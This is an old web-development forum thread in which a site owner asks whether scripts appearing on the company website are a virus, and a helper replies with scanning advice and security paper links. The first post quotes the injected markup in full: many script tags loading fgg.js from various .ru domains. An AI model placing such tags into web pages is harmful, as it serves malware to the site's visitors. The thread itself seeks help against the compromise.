JavaScript / DHTML / AJAX RSS JavaScript / DHTML / AJAX RSS

Is this Strange problem due to virus ?

Please support our JavaScript / DHTML / AJAX advertiser: PostgreSQL or MySQL? Compare and contrast the two most popular open source databases
Reply

Join Date: Jul 2008
Posts: 11
Reputation: sTyleSHA is an unknown quantity at this point 
Solved Threads: 0
sTyleSHA sTyleSHA is offline Offline
Newbie Poster

Is this Strange problem due to virus ?

 
0
  #1
Jul 26th, 2008
Dear All,

I face a strange problem. All of sudden in our company website, the below script gets included automatically the end of the body tag. i.e, above </body> tag. Any idea of how to rectify this problem? Is this some kinda virus ? Do you know any sites that has the solution <script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.keje.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.jvke.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #2
Jul 26th, 2008
your thinking is right...
i think its all because of one virus called JavaScript malware.....
scan your all web pages with anti virus scanner and find what is the exact virus.....
find the source of it...
Last edited by Shanti Chepuru; Jul 26th, 2008 at 1:52 am. Reason: add
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #3
Jul 26th, 2008
See this url for solution :
http://www.blackhat.com/presentation...6-Grossman.pdf
http://www.experts-exchange.com/Viru..._23590128.html
Last edited by Shanti Chepuru; Jul 26th, 2008 at 2:20 am.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 11
Reputation: sTyleSHA is an unknown quantity at this point 
Solved Threads: 0
sTyleSHA sTyleSHA is offline Offline
Newbie Poster

Re: Is this Strange problem due to virus ?

 
0
  #4
Jul 26th, 2008
OOPS ..the experts exchange link needs a paid sign up... But the pdf link was useful...but too technical for me and made me a bit scary of the vulnerabilities....Any ways thankz so much
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #5
Jul 26th, 2008
you also post this thread in viruses forum....
may you get good advices.....
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #6
Jul 26th, 2008
see this:
http://www.informatik.uni-hamburg.de...lware_lncs.pdf
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #7
Jul 26th, 2008
do this first as first aid:
• Do not use the firewall for authentication: All http services in the intranet should employ authentication mechanisms on their own.
• Change all default passwords on home appliances: Authentication is useless if the password is known.
• Disable JavaScript: Enable JavaScript only for trusted pages that really require JavaScript to function.
This does not provide protection for the case that one of this pages was victim of an XSS [2]
attack, but it reduces the attack surface significantly.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 1,071
Reputation: Shanti Chepuru is on a distinguished road 
Solved Threads: 98
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Veteran Poster

Re: Is this Strange problem due to virus ?

 
0
  #8
Jul 26th, 2008
check these:
References
[1] Jesse Burns. Cross site reference forgery - an introduction to a common web application weakness.
Whitepaper, https://www.isecpartners.com/documents/XSRF Paper.pdf, 2005.
[2] David Endler. The evolution of cross-site scripting attacks. Whitepaper, iDefense Inc., http://
www.cgisecurity.com/lib/XSS.pdf, May 2002.
[3] Jeremiah Grossman. Javascript malware, port scanning, and beyond. Posting to the websecurity
mailinglist, http://www.webappsec.org/lists/webse...chive/2006-07/
msg00097.html, July 2006.
[4] Jeremiah Grossman and TC Niedzialkowski. Hacking intranet websites from the outside. Talk
at Black Hat USA 2006, http://www.blackhat.com/presentations/bh-usa-06/
BH-US-06-Grossman.pdf, August 2006.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote Quick reply to this message  
Reply

Quick Reply to Thread
This thread is more than three months old.
Perhaps start a new thread instead?
Message:



Similar Threads
Other Threads in the JavaScript / DHTML / AJAX Forum
Thread Tools Search this Thread



acid2 ajax ajaxcode ajaxexample ajaxhelp ajaxjspservlets animate automatically beta box browser bug calendar captchaformproblem checkbox child close column createrange() css cursor decimal dependent design disablefirebug dom download dropdown editor element embed engine error events explorer ext file form forms google gwt gxt hiddenvalue highlightedword hint html htmlform ie8 iframe images index internet java javascript javascripthelp2020 jawascriptruntimeerror jquery jsf jsfile jump libcurl listbox math media microsoft mimic mp4 object onmouseoutdivproblem onmouseover onreadystatechange parent paypal pdf php player post problem progressbar regex runtime scroll search security select shopping size software sql text textarea unicode w3c web website window windowofwords windowsxp wysiwyg \n
About Us | Contact Us | Advertise | DaniWeb | Acceptable Use Policy | RSS Feed

©2003 - 2009 DaniWeb® LLC